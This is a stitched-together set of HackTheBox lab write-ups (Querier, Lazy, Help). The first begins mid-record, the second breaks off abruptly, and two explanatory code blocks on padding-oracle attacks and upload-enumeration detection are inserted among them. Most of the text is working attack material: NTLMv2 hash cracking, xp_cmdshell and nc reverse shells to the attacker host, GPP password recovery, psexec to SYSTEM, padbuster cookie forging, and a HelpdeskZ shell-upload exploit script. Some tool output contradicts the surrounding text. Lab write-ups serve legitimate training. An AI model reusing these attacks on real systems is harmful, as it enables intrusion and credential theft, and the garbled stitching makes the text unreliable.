[SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:deb00bb106fe5da...
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : QUERIER\mssql-svc
[SMBv2] NTLMv2-SSP Hash : mssql-svc::QUERIER:19dda42e4d...
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash : gX:::95b69835a01d6daf::
[SMBv2] NTLMv2-SSP Client : 10.10.10.125
[SMBv2] NTLMv2-SSP Username : \gX
[SMBv2] NTLMv2-SSP Hash : gX:::becdc277e39afb84::
Now, we got a hash for user mssql-svc.
Then try to crack with John the Ripper.
root@kali:~# cat hash.txt
mssql-svc::QUERIER:19dda42e4d...
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash(netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568 (mssql-svc)
1g 0:00:00:08 DONE (2019-06-23 18:29) 0.1149g/s 1030Kp/s 1030Kc/s 1030KC/s correforenz..coreyny11
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
This means that we got following credential.
mssql-svc:corporate568
mssql-svc is the SQL Server service account, so log in again with the cracked credential (still Windows authentication).
root@kali:~# /usr/share/doc/python-impacket/examples/mssqlclient.py -windows-auth mssql-svc@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password: # corporate568
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(QUERIER): Line 1: Changed database context to 'master'.
[*] INFO(QUERIER): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
This time the account has the rights to enable the stored procedure "xp_cmdshell". The enable_xp_cmdshell helper built into mssqlclient.py runs the necessary sp_configure calls for us.
SQL> enable_xp_cmdshell
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL>
Then we need a reverse shell.
Kali ships nc.exe in /usr/share/windows-resources/binaries, so serve that directory over HTTP.
root@kali:/usr/share/windows-resources/binaries# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Start a listener, then use xp_cmdshell to fetch nc.exe from our host and run it back to port 443.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN)[10.10.10.125] 49715
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
querier\mssql-svc
user.txt is in the home directory of user mssql-svc.
C:\Users\mssql-svc\Desktop>type user.txt
type user.txt
c37b41bb669da345bb14de50faab3c16
After uploading PowerUp.ps1 the same way, start PowerShell with the execution policy bypassed and import the script.
C:\Users\mssql-svc\Desktop>powershell.exe -nop -exec bypass
powershell.exe -nop -exec bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\mssql-svc\Desktop> import-module ./powerup.ps1
import-module ./powerup.ps1
Then, execute “Invoke-AllChecks”.
PS C:\Users\mssql-svc\Desktop> invoke-allchecks
invoke-allchecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Windows\system32\svchost.exe -k netsvcs -p
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
CanRestart : True
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
IdentityReference : QUERIER\mssql-svc
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for modifidable registry autoruns and configs...
[*] Checking for modifiable schtask files/configs...
[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[*] Checking for cached Group Policy Preferences .xml files....
Changed : {2019-01-28 23:12:48}
UserNames : {Administrator}
NewName : [BLANK]
Passwords : {MyUnclesAreMarioAndLuigi!!1!}
File : C:\ProgramData\Microsoft\Group Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml
We found a cached Group Policy Preferences file, Groups.xml, that sets the local Administrator password. GPP stores such passwords as a "cpassword" attribute, AES-encrypted with a key that Microsoft published in its own documentation, which is why PowerUp can print it in plaintext. (The modifiable UsoSvc service found above would be another route to SYSTEM, but the credential is quicker.)
Administrator:MyUnclesAreMarioAndLuigi!!1!
As mentioned, Kali has Impacket installed by default.
We can use the script "psexec.py" with this credential and get an administrator shell.
root@kali:/usr/share/doc/python-impacket/examples# ./psexec.py QUERIER/Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.125.....
[*] Found writable share ADMIN$
[*] Uploading file JEUWVaHv.exe
[*] Opening SVCManager on 10.10.10.125.....
[*] Creating service qkdV on 10.10.10.125.....
[*] Starting service qkdV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Hackthebox is a website that hosts a bunch of vulnerable machines inside its own VPN.
This is a write-up of the machine "Lazy" on that website.
Lazy is a fairly old machine, but I needed to practice the padding oracle attack for a CTF and Lazy is good for that purpose.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.18 -sC -sV
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-10 12:49 EEST
Nmap scan report for 10.10.10.18
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
| 2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
| 256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_ 256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.57 seconds
Since I had a similar situation in a CTF before, it is not hard to guess that the web application is vulnerable to a padding oracle attack: the site sets an "auth" cookie that is a base64-encoded CBC ciphertext (24 bytes, i.e. an 8-byte IV followed by two 8-byte blocks), and index.php responds differently when the padding of a tampered cookie is invalid.
We can use padbuster against that cookie, with block size 8.
Because the server does not return an explicit error string, padbuster first asks us which response signature corresponds to the padding error.
root@kali:~# padbuster http://10.10.10.18/index.php GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k 8 --cookies auth=GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 15
INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Then, wait for the result.
The cookie decrypts to “user=1n4r1”.
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (126/256)[Byte 8]
[+] Success: (241/256)[Byte 7]
[+] Success: (47/256)[Byte 6]
[+] Success: (220/256)[Byte 5]
[+] Success: (127/256)[Byte 4]
[+] Success: (24/256)[Byte 3]
[+] Success: (221/256)[Byte 2]
[+] Success: (156/256)[Byte 1]
Block 1 Results:
[+] Cipher Text (HEX): 64e730165be8801c
[+] Intermediate Bytes (HEX): 6c24ee8420d20d83
[+] Plain Text: user=ina
Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***
[+] Success: (229/256)[Byte 8]
[+] Success: (124/256)[Byte 7]
[+] Success: (19/256)[Byte 6]
[+] Success: (167/256)[Byte 5]
[+] Success: (235/256)[Byte 4]
[+] Success: (208/256)[Byte 3]
[+] Success: (47/256)[Byte 2]
[+] Success: (226/256)[Byte 1]
Block 2 Results:
[+] Cipher Text (HEX): da6ba027bc005e64
[+] Intermediate Bytes (HEX): 16d636105dee861a
[+] Plain Text: r1
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): user=1n4r1
[+] Decrypted value (HEX): 757365723D696E617231060606060606
[+] Decrypted value (Base64): dXNlcj1pbmFyMQYGBgYGBg==
-------------------------------------------------------
So we can assume that if we forge a cookie whose decrypted value is “user=admin”, we can bypass the authentication.
root@kali:~# padbuster http://10.10.10.18/index.php GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k 8 --cookies auth=GVeL9h27Y+Jk5zAWW+iAHNproCe8AF5k -plaintext user=admin
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 15
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (196/256)[Byte 8]
[+] Success: (148/256)[Byte 7]
[+] Success: (92/256)[Byte 6]
[+] Success: (41/256)[Byte 5]
[+] Success: (218/256)[Byte 4]
[+] Success: (136/256)[Byte 3]
[+] Success: (150/256)[Byte 2]
[+] Success: (190/256)[Byte 1]
Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d
[+] Success: (1/256)[Byte 8]
[+] Success: (36/256)[Byte 7]
[+] Success: (180/256)[Byte 6]
[+] Success: (17/256)[Byte 5]
[+] Success: (146/256)[Byte 4]
[+] Success: (50/256)[Byte 3]
[+] Success: (132/256)[Byte 2]
[+] Success: (135/256)[Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
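The mechanics behind the two padbuster runs above, as an added example that is not part of the original write-up: a toy CBC cookie scheme with 8-byte blocks (a Feistel network over HMAC-SHA256 stands in for the real block cipher, because the attack never looks inside it), a vulnerable check that leaks whether the padding was valid (the two response signatures padbuster found), the attacker-side recovery of the "Intermediate Bytes" used both to decrypt the cookie and to forge one for "user=admin" (the last block of a forged value is arbitrary, which is why the forged cookie above ends in zero bytes, "AAAAAAAAAAA" in base64), and a hardened check that authenticates the cookie with an HMAC before decrypting, so the same queries learn nothing. Keys, the Feistel construction and all values are constructed for the demo; nothing here is the target's code.

```python
import hmac
import hashlib
import secrets

BLOCK = 8                          # 8-byte blocks, the block size padbuster was given above
KEY = secrets.token_bytes(16)      # constructed demo keys (the real site's are unknown)
MAC_KEY = secrets.token_bytes(16)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, block, decrypt=False):
    """Toy 4-round Feistel block cipher over HMAC-SHA256 (not AES; the attack never looks inside it)."""
    left, right = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in (reversed(range(4)) if decrypt else range(4)):
        f = hmac.new(key, bytes([rnd]) + (left if decrypt else right), hashlib.sha256).digest()[:BLOCK // 2]
        left, right = (xor(right, f), left) if decrypt else (right, xor(left, f))
    return left + right

def pad(data):  # PKCS#7: "user=1n4r1" (10 bytes) becomes 16 bytes ending in six 0x06, as in the hex above
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, plaintext):  # returns IV || ciphertext: the cookie layout above (IV + 2 blocks)
    iv = secrets.token_bytes(BLOCK)
    out, prev, padded = [iv], iv, pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = feistel(key, xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, token):
    out, prev = [], token[:BLOCK]
    for i in range(BLOCK, len(token), BLOCK):
        out.append(xor(feistel(key, token[i:i + BLOCK], decrypt=True), prev))
        prev = token[i:i + BLOCK]
    return unpad(b"".join(out))

def vulnerable_padding_ok(token):  # leaks padding validity: the 1133- vs 15-byte responses above
    try:
        cbc_decrypt(KEY, token)
    except ValueError:
        return False
    return True

def recover_intermediate(oracle, block):
    """Attacker side: learn D_k(block) (padbuster's "Intermediate Bytes") from the oracle alone."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad_val = BLOCK - pos
        for guess in range(256):
            forged = bytearray(inter[j] ^ pad_val for j in range(BLOCK))  # bytes after pos decrypt to pad_val
            forged[pos] = guess
            if not oracle(bytes(forged) + block):
                continue
            if pos == BLOCK - 1:  # last byte: make sure we hit 0x01 and not an accidental 0x02 0x02
                forged[pos - 1] ^= 0xFF
                if not oracle(bytes(forged) + block):
                    continue
            inter[pos] = guess ^ pad_val
            break
        else:
            raise RuntimeError("no padding leak: the oracle never accepted a forged block")
    return bytes(inter)

def attack_decrypt(oracle, token):
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    return unpad(b"".join(xor(recover_intermediate(oracle, c), p) for p, c in zip(blocks, blocks[1:])))

def attack_forge(oracle, plaintext):
    """Forge IV || ciphertext for a chosen plaintext without the key; the last block is free and set to zeros, as padbuster does."""
    padded = pad(plaintext)
    cur = out = bytes(BLOCK)
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])
        out = cur + out
    return out

def issue_cookie(plaintext):  # hardened server: MAC over IV || ciphertext, verified before decrypting
    token = cbc_encrypt(KEY, plaintext)
    return token + hmac.new(MAC_KEY, token, hashlib.sha256).digest()

def hardened_padding_ok(cookie):
    token, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(tag, hmac.new(MAC_KEY, token, hashlib.sha256).digest()):
        return False  # same answer as a padding failure, so there is nothing to distinguish
    return vulnerable_padding_ok(token)

def demo():
    cookie = cbc_encrypt(KEY, b"user=1n4r1")
    recovered = attack_decrypt(vulnerable_padding_ok, cookie)
    forged = attack_forge(vulnerable_padding_ok, b"user=admin")
    return recovered, cbc_decrypt(KEY, forged)
```

demo() decrypts a constructed cookie and then forges one that the server decrypts as "user=admin", using at most 256 queries per byte, which is the "(n/256)[Byte k]" counter in padbuster's output. Running attack_decrypt against hardened_padding_ok instead raises RuntimeError, because a bad tag and a bad padding produce the same answer. The fix is not the MAC alone but the order: verify first, and only then decrypt; an authenticated mode such as AES-GCM gives the same property in one primitive.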
Then, try to access the site with the cookie “auth=BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA”.
We can find an interesting path, “/mysshkeywithnamemitsos”.
By accessing the url “http://10.10.10.18/mysshkeywithnamemitsos”
Hackthebox is a website that hosts a bunch of vulnerable machines in its own VPN.
This is a write-up of the machine “Help” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -sV -sC -p- 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-30 08:06 EET
Nmap scan report for 10.10.10.121
Host is up (0.035s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.73 seconds
We already have exploit code for this on our Kali Linux box. However, the script needs a small modification:
I have commented out the line that needed fixing and added a new line in its place.
#!/usr/bin/env python3
# HelpdeskZ 1.0.2 unauthenticated shell upload: the server stores the attachment as
# md5(<original filename> + <unix time>).php, so the script walks back over the last
# 300 seconds and asks the server which of the candidate names exists.
import hashlib
import time
import sys
import requests

print('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')
if len(sys.argv) < 3:
    print("Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0]))
    sys.exit(1)

helpdeskzBaseUrl = sys.argv[1]  # concatenated directly with the hash, so it must end with '/'
fileName = sys.argv[2]

# Original line: it derives the time from the server's Date header, but neither `r` nor
# `datetime` is defined in this script, so it is replaced by the local clock below.
# currentTime = int((datetime.datetime.strptime(r.headers['date'], "%a, %d %b %Y %H:%M:%S %Z") - datetime.datetime(1970,1,1)).total_seconds())
currentTime = int(time.time())

for x in range(0, 300):
    plaintext = fileName + str(currentTime - x)
    md5hash = hashlib.md5(plaintext.encode()).hexdigest()
    url = helpdeskzBaseUrl + md5hash + '.php'
    response = requests.head(url)
    if response.status_code == 200:
        print("found!")
        print(url)
        sys.exit(0)
print("Sorry, I did not find anything")
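A detection-side counterpart to the script above, added here and not part of the write-up or of HelpdeskZ: the exploit loop produces a burst of HEAD requests for 32-hex-character .php names within a few seconds, almost all answered 404, so a web-server log rule that counts such probes per client in a sliding window catches it even when the final request succeeds. Apache's combined log format is assumed; the log lines, the /uploads/ path, the second client 10.10.14.9 and the timestamps are constructed for the demo (10.10.14.3 is the attacking host shown in the write-up's nc output).

```python
import hashlib
import re
from collections import defaultdict, deque
from datetime import datetime, timezone

# Apache "combined" access-log line; the rule only needs client, timestamp, method, path and status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# What the exploit above requests: <32 hex chars>.php, i.e. md5(<filename> + <time>).php
PROBE_RE = re.compile(r"/[0-9a-f]{32}\.php$")
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def detect_upload_enumeration(lines, threshold=20, window=60):
    """Flag a client that requests >= `threshold` md5-looking .php names within `window` seconds.
    Returns {ip: (probe_count, first_path_that_returned_200_or_None)}."""
    recent = defaultdict(deque)  # ip -> (epoch, status, path) tuples inside the sliding window
    alerts = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not PROBE_RE.search(m["path"]):
            continue
        t = datetime.strptime(m["ts"], TS_FMT).timestamp()
        q = recent[m["ip"]]
        q.append((t, int(m["status"]), m["path"]))
        while q and t - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold:
            hit = next((p for _, s, p in q if s == 200), None)
            alerts[m["ip"]] = (len(q), hit)
    return alerts

def sample_log():
    """Constructed log: one client walks back through 25 candidate names in 3 seconds (the last one exists),
    plus ordinary traffic from another client that must not be flagged."""
    start = 1548853200  # constructed epoch, 30 Jan 2019

    def line(ip, t, method, path, status):
        ts = datetime.fromtimestamp(t, timezone.utc).strftime(TS_FMT)
        return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 0 "-" "python-requests/2.21.0"'

    lines = [line("10.10.14.9", start, "GET", "/support/", 200),
             line("10.10.14.9", start + 1, "GET", "/support/index.php", 200)]
    for i in range(25):
        name = hashlib.md5(f"shell.php{start - i}".encode()).hexdigest()  # same scheme the script guesses
        status = 200 if i == 24 else 404
        lines.append(line("10.10.14.3", start + i // 9, "HEAD", f"/uploads/{name}.php", status))
    return lines
```

detect_upload_enumeration(sample_log()) returns only the probing client, with the count and the one path that answered 200, which is the file an incident responder should look at first. The root cause the rule is compensating for is the predictable name md5(filename + time()); naming uploads with a random token (for example secrets.token_hex), fixing the extension server-side and rejecting the file before it touches disk remove the guessing window entirely.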
Then, upload our PHP reverse shell, start the nc listener and run the exploit.
root@kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.121] 45226
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
13:00:57 up 5:15, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)